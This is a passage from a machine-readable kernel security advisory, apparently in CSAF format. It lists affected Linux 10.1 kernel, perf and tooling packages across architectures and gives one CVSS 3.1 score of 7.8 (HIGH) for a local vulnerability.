"RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
